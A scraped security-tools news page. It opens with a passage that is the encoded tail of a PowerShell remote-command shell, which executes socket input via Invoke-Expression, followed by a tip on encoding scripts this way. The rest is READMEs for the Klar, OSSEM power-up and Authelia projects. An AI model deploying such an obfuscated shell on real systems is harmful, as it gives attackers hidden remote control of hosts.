AAtAG4AZQAgACIAZQB4AGkAdAAiACkAIAB7AA0ACgAJAAkACQAJAHQAcgB5ACAAewANAAoACQAJAAkACQAJACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABkAGEAdABhACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwANAAoACQAJAAkACQB9ACAAYwBhAHQAYwBoACAAewANAAoACQAJAAkACQAJACQAcgBlAHMAdQBsAHQAIAA9ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsADQAKAAkACQAJAAkAfQANAAoACQAJAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAkAHIAZQBzAHUAbAB0ACkAOwANAAoACQAJAAkACQBDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGQAYQB0AGEAIgA7AA0ACgAJAAkACQB9AA0ACgAJAAkAfQAgAHcAaABpAGwAZQAgACgAJABkAGEAdABhACAALQBuAGUAIAAiAGUAeABpAHQAIgApADsADQAKAAkAfQAgAGMAYQB0AGMAaAAgAHsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsADQAKAAkAfQAgAGYAaQBuAGEAbABsAHkAIAB7AA0ACgAJAAkAaQBmACAAKAAkAHMAbwBjAGsAZQB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKAAkACQAJACQAcwBvAGMAawBlAH   QALgBDAGwAbwBzAGUAKAApADsADQAKAAkACQAJACQAcwBvAGMAawBlAHQALgBEAGkAcwBwAG8AcwBlACgAKQA7AA0ACgAJAAkAfQANAAoACQAJAGkAZgAgACgAJABzAHQAcgBlAGEAbQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AA0ACgAJAAkACQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AA0ACgAJAAkACQAkAHMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAYgB1AGYAZgBlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAJABiAHUAZgBmAGUAcgAuAEMAbABlAGEAcgAoACkAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAdwByAGkAdABlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEMAbABvAHMAZQAoACkAOwANAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEQAaQBzAHAAbwBzAGUAKAApADsADQAKAAkACQB9AA0ACgAJAAkAaQBmACAAKAAkAGQAYQB0AGEAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAcgBlAHMAdQBsAHQAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgByAGUAcwB1AGwAdAAiADsADQA   KAAkACQB9AA0ACgAJAH0ADQAKAH0ADQAKAA==
To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))

Images




Klar - Integration Of Clair And Docker Registry

$
0
0

Integration of Clair and Docker Registry (supports both Clair API v1 and v3)
Klar is a simple tool to analyze images stored in a private or public Docker registry for security vulnerabilities using Clair https://github.com/coreos/clair. Klar is designed to be used as an integration tool so it relies on enviroment variables. It's a single binary which requires no dependencies.
Klar serves as a client which coordinates the image checks between the Docker registry and Clair.

Binary installation
The simplest way is to download the latest release (for OSX and Linux) from https://github.com/optiopay/klar/releases/ and put the binary in a folder in your PATH (make sure it has execute permission).

Installation from source code
Make sure you have Go language compiler installed and configured https://golang.org/doc/install
Then run
go get github.com/optiopay/klar
make sure your Go binary folder is in your PATH (e.g. export PATH=$PATH:/usr/local/go/bin)

Usage
Klar process returns if 0 if the number of detected high severity vulnerabilities in an image is less than or equal to a threshold (see below) and 1 if there were more. It will return 2 if an error has prevented the image from being analyzed.
Klar can be configured via the following environment variables:
  • CLAIR_ADDR - address of Clair server. It has a form of protocol://host:port - protocol and port default to http and 6060 respectively and may be omitted. You can also specify basic authentication in the URL: protocol://login:password@host:port.
  • CLAIR_OUTPUT - severity level threshold, vulnerabilities with severity level higher than or equal to this threshold will be outputted. Supported levels are Unknown, Negligible, Low, Medium, High, Critical, Defcon1. Default is Unknown.
  • CLAIR_THRESHOLD - how many outputted vulnerabilities Klar can tolerate before returning 1. Default is 0.
  • CLAIR_TIMEOUT - timeout in minutes before Klar cancels the image scanning. Default is 1
  • DOCKER_USER - Docker registry account name.
  • DOCKER_PASSWORD - Docker registry account password.
  • DOCKER_TOKEN - Docker registry account token. (Can be used in place of DOCKER_USER and DOCKER_PASSWORD)
  • DOCKER_INSECURE - Allow Klar to access registries with bad SSL certificates. Default is false. Clair will need to be booted with -insecure-tls for this to work.
  • DOCKER_TIMEOUT - timeout in minutes when trying to fetch layers from a docker registry
  • DOCKER_PLATFORM_OS - The operating system of the Docker image. Default is linux. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.
  • DOCKER_PLATFORM_ARCH - The architecture the Docker image is optimized for. Default is amd64. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.
  • REGISTRY_INSECURE - Allow Klar to access insecure registries (HTTP only). Default is false.
  • JSON_OUTPUT - Output JSON, not plain text. Default is false.
  • FORMAT_OUTPUT - Output format of the vulnerabilities. Supported formats are standard, json, table. Default is standard. If JSON_OUTPUT is set to true, this option is ignored.
  • WHITELIST_FILE - Path to the YAML file with the CVE whitelist. Look at whitelist-example.yaml for the file format.
  • IGNORE_UNFIXED - Do not count vulnerabilities without a fix towards the threshold
Usage:
CLAIR_ADDR=localhost CLAIR_OUTPUT=High CLAIR_THRESHOLD=10 DOCKER_USER=docker DOCKER_PASSWORD=secret klar postgres:9.5.1

Debug Output
You can enable more verbose output but setting KLAR_TRACE to true.
  • run export KLAR_TRACE=true to persist between runs.

Dockerized version
Klar can be dockerized. Go to $GOPATH/src/github.com/optiopay/klar and build Klar in project root. If you are on Linux:
CGO_ENABLED=0 go build -a -installsuffix cgo .
If you are on Mac don't forget to build it for Linux:
GOOS=linux go build .
To build Docker image run in the project root (replace klar with fully qualified name if you like):
docker build -t klar .
Then pass env vars as separate --env arguments, or create an env file and pass it as --env-file argument. For example save env vars as my-klar.env:
CLAIR_ADDR=localhost
CLAIR_OUTPUT=High
CLAIR_THRESHOLD=10
DOCKER_USER=docker
DOCKER_PASSWORD=secret
Then run
docker run --env-file=my-klar.env klar postgres:9.5.1

Amazon ECR support
There is no permanent username/password for Amazon ECR, the credentials must be retrived using aws ecr get-login and they are valid for 12 hours. Here is a sample script which may be used to provide Klar with ECR credentials:
DOCKER_LOGIN=`aws ecr get-login --no-include-email`
PASSWORD=`echo $DOCKER_LOGIN | cut -d' ' -f6`
REGISTRY=`echo $DOCKER_LOGIN | cut -d' ' -f7 | sed "s/https:\/\///"`
DOCKER_USER=AWS DOCKER_PASSWORD=${PASSWORD} ./klar ${REGISTRY}/my-image

Google GCR support
For authentication against GCR (Google Cloud Registry), the easiest way is to use the application default credentials. These only work when running Klar from GCP. The only requirement is the Google Cloud SDK.
DOCKER_USER=oauth2accesstoken
DOCKER_PASSWORD="$(gcloud auth application-default print-access-token)"
With Docker:
DOCKER_USER=oauth2accesstoken
DOCKER_PASSWORD="$(docker run --rm google/cloud-sdk:alpine gcloud auth application-default print-access-token)"


OSSEM - A Tool To Assess Data Quality

$
0
0

A tool to assess data quality, built on top of the awesome OSSEM project.

Mission
  • Answer the question: I want to start hunting ATT&CK techniques, what log sources and events are more suitable?
  • Create transparency on the strengths and weaknesses of your log sources
  • Provide an easy way to evaluate your logs

OSSEM Power-up Overview
Power-up uses OSSEM Detection Data Model (DDM) as the foundation of its data quality assessment. The main reason for this is because it provides a structured way to correlate ATT&CK Data Sources, Common information model entities (CIM), and Data Dictionaries (events) with each other.
For those unfamiliar the DDM structure, here is a sample:
ATT&CK Data SourceSub Data SourceSource Data ObjectRelationshipDestination Data ObjectEventID
Process monitoringprocess creationprocesscreatedprocess4688
Process monitoringprocess creationprocesscreatedprocess1
Process monitoringprocess terminationprocessterminated-4689
Process monitoringprocess terminationprocessterminated-5
As you can see each entry in the DDM defines a sub data source (scope) using abstract entities like process, user, file, etc. Each of these entries also contain an event ID, where the scope applies. You can read more about these entitites here.
In a nutshell, DDM entries play a major role on removing the complexity of raw events, by providing a scope that defines how a log source (data channels) can be consumed.

Data Quality Dimensions
Power-up assesses data quality score according to five distinct dimensions:
DimensionTypeDescription
CoverageData channelHow many devices or network segments are covered by the data channel
TimelinessData channelHow long does it take for the event to be available
RetentionData channelHow long does the event remain available
StructureEventHow complete is the event, if relevant fields are available
ConsistencyEventHow standard are the event fields, if fields have been normalized
Every dimension is rated with a score between 0 (none) to 5 (excelent).

Coverage, Timeliness and Retention
These dimensions are tied to data channels, and propagate to all events provided by it.
Due to the nature of these dimensions, they must be rated manually, according to the specifities of the data channels.
Power-up uses resources/dcs.yml to define data channel and rate the dimensions:
data channel: sysmon
description: sysmon monitoring
coverage: 2
timeliness: 5
retention: 2
---
data channel: security
description: windows security auditing
coverage: 5
timeliness: 5
retention: 2

Structure
In order to calculate how complete the event structure is, power-up compares the data dictionary standard names with the fields of the entities (CIM) referenced in the DDM entry (source and destination).
Because not all entity fields are relevant (depends on the context), power-up uses the concept of profiles to select which fields need to match the data dictionary standard names. For example:
# OSSEM CIM Profile
process:
- process_name
- process_path
- process_command_line
Note: There is an example profile in profiles/default.yml for you to play with.
The structure score is calculated with the following formula:
SCORE_PERCENT = (MATCHED_FIELDS / TOTAL_RELEVANT_FIELDS) * 100
For the sake of clarity, here is an example of how structure score is calculated:


Note: Because Sysmon Event Id 1 data dictionary matches 100% of the relevant entity fields, the structure score will be rated as 5 (excelent).
The structure score is translated to the 0-5 scale in the following way:
PercentageScore
00
1 to 251
26 to 502
51 to 753
76 to 994
1005
Note: Depending on the use case (SIEM, Threat Hunting, Forensics), you can define different profiles so that you can rate your logs differently.

Consistency
To calculate consistency, power-up simply calculates the percentage of fields with a standard name in a data dictionary. Data dictionaries with a high number of fields mapped to a standard name are more likely to correlate with CIM entities.
The consistency score is calculated with the following formula:
SCORE_PERCENT = (STANDARD_NAME_FIELDS / TOTAL_FIELDS) * 100
The consistency score is translated to the 0-5 scale in the following way:
PercentageScore
00
1 to 501
51 to 993
1005

How to use

Before you start
  • Power-up is a python script, be sure to pip install -r requirements.txt
  • Be sure to have a local copy of OSSEM repository

Running power-up
$> python3 powerup.py --help
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

usage: powerup.py [-h] [-o OSSEM] [-y OSSEM_YAML] [-p PROFILE] [--excel]
[--elastic] [--yaml]

A tool to assess ATT&CK data source coverage, built on top of awesome OSSEM.

optional arguments:
-h, --help show this help message and exit
-o OSSEM, --ossem OSSEM
path to import OSSEM markdown
-y OSSEM_YAML, --ossem-yaml OSSEM_YAML
path to import OSSEM yaml
-p PROFILE, --profile PROFILE
path to CIM profile
--excel export OSSEM DDM to excel
--elastic export OSSEM data models to elastic
--yaml export OSSEM data models to yaml
--layer export OSSEM data models to navigator layer
As you can see power-up can consume OSSEM data from two different formats:
  • OSSEM markdown - The native format of OSSEM when you clone from git.
  • OSSEM yaml - A sumarized format of OSSEM, only the data fields and a few metadata. You can power-up to convert OSSEM markdown to yaml.
Currently, Power-up exports OSSEM output to:
  • Yaml - Creates OSSEM structures in yaml, in the output/ folder
  • Excel - Creates an OSSEM DDM table, enriched with the data quality scores, in the ouput/ folder
  • Elastic - Creates an OSSEM structure in elastic, the indexes are as follows:
    • ossem.ddm - OSSEM DDM table, enriched with the data quality scores
    • ossem.cim - OSSEM CIM entries
    • ossem.dds - OSSEM Data Dictionaries
    • ossem.dcs - OSSEM Data Channels
Note: if no profile file path is specified power-up uses profiles/default.yml by default.

Exporting to YAML
$> python3 powerup.py -o ../OSSEM --yaml
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM to YAML
[*] Created output/ddm_20191114_160246.yml
[*] Created output/cim_20191114_160246.yml
[*] Created output/dds_20191114_160246.yml
The goal of exporting/importing to/from YAML is to facilitate OSSEM customization. Chances are that the first you will do is create your own data dictionaries, and then add new DDM entries, so YAML will make updates easier.
Note 1: modify resources/config.yml to instruct power-up about the file names for the correct structures. Then you just need to place then in a folder and pass to OSSEM_YAML argument.
Note 2:power-up does not parse the entire OSSEM objects to YAML, only the data fields and some metadata (i.e. description). The reason for this is that I wanted to keep the YAML object as lean as possible, just with the data you need to assess data quality.

Exporting to EXCEL
$> python3 powerup.py -o ../OSSEM --excel
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM DDM to Excel
[*] Saved Excel to output/ddm_enriched_20191114_160041.xlsx
When exporting to Excel, power-up will create an eye-candy DDM, with the respective data quality dimensions for every entry:


Exporting to ELASTIC
$> python3 powerup.py -o ../OSSEM --elastic
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM to Elastic
[*] Creating elastic index ossem.ddm
[*] Creating elastic index ossem.cim
[*] Creating elastic index ossem.dds
[*] Creating elastic index ossem.dcs
When exporting to Elastic, power-up will store all OSSEM data in elastic. Because the DDM is also enriched with the respective data quality dimensions, you will be able to create dashboards like this:


Exporting to ATT&CK Navigator
$> python3 powerup.py -o ../OSSEM --layer
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM to Naviagator Layer
[*] Pulling ATT&CK data
[*] Generating data source quality layer
[*] Created output/ds_layer_20191119_220141.json
When exporting to layer, power-up will create an Attack Navigator Layer JSON file, with the respective data quality dimensions for every technique:


Note: technique scores are derived from data sources average scores in the DDM.

Acknowledgements

To-Do
  • Create additional documentation
  • Export to ATT&CK Navigator Layer
  • Properly handle data dictionaries that share the same data channel, but have different schema depending on the operating system
  • Provide Kibana objects (visualizations and dashboards)


Authelia - The Single Sign-On Multi-Factor Portal For Web Apps

$
0
0

Authelia is an open-source authentication and authorization server providing 2-factor authentication and single sign-on (SSO) for your applications via a web portal. It acts as a companion of reverse proxies like nginx, Traefik or HAProxy to let them know whether queries should pass through. Unauthenticated user are redirected to Authelia Sign-in portal instead.
Documentation is available at https://docs.authelia.com.

Authelia can be installed as a standalone service from the AUR, using a Static binary, Docker or can also be deployed easily on Kubernetes leveraging ingress controllers and ingress configuration.

Here is what Authelia's portal looks like



Features summary
Here is the list of the main available features:
For more details about the features, follow Features.

Proxy support
Authelia works in combination with nginx, Traefik or HAProxy. It can be deployed on bare metal with Docker or on top of Kubernetes.

Getting Started
You can start utilising Authelia with the provided docker-compose bundles:

Local
The Local compose bundle is intended to test Authelia without worrying about configuration. It's meant to be used for scenarios where the server is not be exposed to the internet. Domains will be defined in the local hosts file and self-signed certificates will be utilised.

Lite
The Lite compose bundle is intended for scenarios where the server will be exposed to the internet, domains and DNS will need to be setup accordingly and certificates will be generated through LetsEncrypt. The Lite element refers to minimal external dependencies; File based user storage, SQLite based configuration storage. In this configuration, the service will not scale well.

Full
The Full compose bundle is intended for scenarios where the server will be exposed to the internet, domains and DNS will need to be setup accordingly and certificates will be generated through LetsEncrypt. The Full element refers to a scalable setup which includes external dependencies; LDAP based user storage, Database based configuration storage (MariaDB, MySQL or Postgres).

Deployment
Now that you have tested Authelia and you want to try it out in your own infrastructure, you can learn how to deploy and use it with Deployment. This guide will show you how to deploy it on bare metal as well as on Kubernetes.

Security
Security is taken very seriously here, therefore we follow the rule of responsible disclosure and we encourage you to do so.
Would you like to report any vulnerability discovered in Authelia, please first contact clems4ever on Matrix or by email.
For details about security measures implemented in Authelia, please follow this link.

Breaking changes
See BREAKING.

Contribute
If you want to contribute to Authelia, check the documentation available here.

Contributors
Authelia exists thanks to all the people who contribute. [Contribute].

Backers
Thank you to all our backers! [Become a backer] and help us sustain our community.

Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>